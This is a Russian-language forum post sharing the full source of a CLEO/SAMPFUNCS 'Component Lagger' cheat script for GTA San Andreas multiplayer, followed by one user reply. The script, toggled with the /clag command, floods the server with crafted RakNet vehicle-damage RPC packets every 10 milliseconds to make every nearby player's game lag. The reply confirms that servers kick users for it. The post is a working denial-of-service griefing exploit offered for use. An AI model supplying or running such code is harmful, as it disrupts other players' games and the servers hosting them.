Приветули, расскажу о клео, которое заставляет лагать гта у всех в зоне прорисовки. Как работает: Спамит отбитыми деталями машины. (дверями, капотом, багажником и т.п) Требования: CLEO 4.1+ SAMPFUNCS 5.3.3 Активация: /clag сидя в автомобиле. Автор: 0pc0d3R Код:
Код
{$CLEO .cs} 0000: Component Lagger by 0pc0d3R repeat wait 0 until samp.Available() chatmsg "{F53D00}Component {F5B800}Lagger by {00F5B8}0pc0d3R" 0xffffff chatmsg "{FFDB70}Specially for {70FFDB}0psofter.pro!" 0xffffff 0B34: samp register_client_command "clag" to_label @CMD while true wait 0 if and 0@ == 1 Actor.Driving($PLAYER_ACTOR) then 3@ = Actor.CurrentCar($PLAYER_ACTOR) 2@ = SAMP.GetSAMPVehicleIDByCarHandle(3@) 1@ = RakNet.NewBitStream() RakNet.Write(1@, 2@, BS_TYPE_SHORT, 2) RakNet.Write(1@, 50331648, BS_TYPE_INT, 4) RakNet.Write(1@, 67372036, BS_TYPE_INT, 4) RakNet.Write(1@, 0, BS_TYPE_BYTE, 1) RakNet.Write(1@, 0, BS_TYPE_BYTE, 1) RakNet.LiteRPC(106, 1@) RakNet.DeleteBitStream(1@) 1@ = RakNet.NewBitStream() RakNet.Write(1@, 2@, BS_TYPE_SHORT, 2) RakNet.Write(1@, 0, BS_TYPE_INT, 4) RakNet.Write(1@, 0, BS_TYPE_INT, 4) RakNet.Write(1@, 0, BS_TYPE_BYTE, 1) RakNet.Write(1@, 0, BS_TYPE_BYTE, 1) RakNet.LiteRPC(106, 1@) RakNet.DeleteBitStream(1@) wait 10 end end :CMD if 0@ == 0 then chatmsg "{FF6633}Лаггер компонентами транспорта {3DFF3D}включен!" 0xffffff else chatmsg "{B82E00}Компонент лаггер {FF0000}выключен." 0xffffff end 0B12: 0@ = 0@ XOR 1 SAMP.CmdRet()
У меня было как-то такое, только там на клавишу пока держишь, детальки отваливаются. На АРП кикает за это. А так да, кто это видит, у того дико лагает игра на 'пенсии'...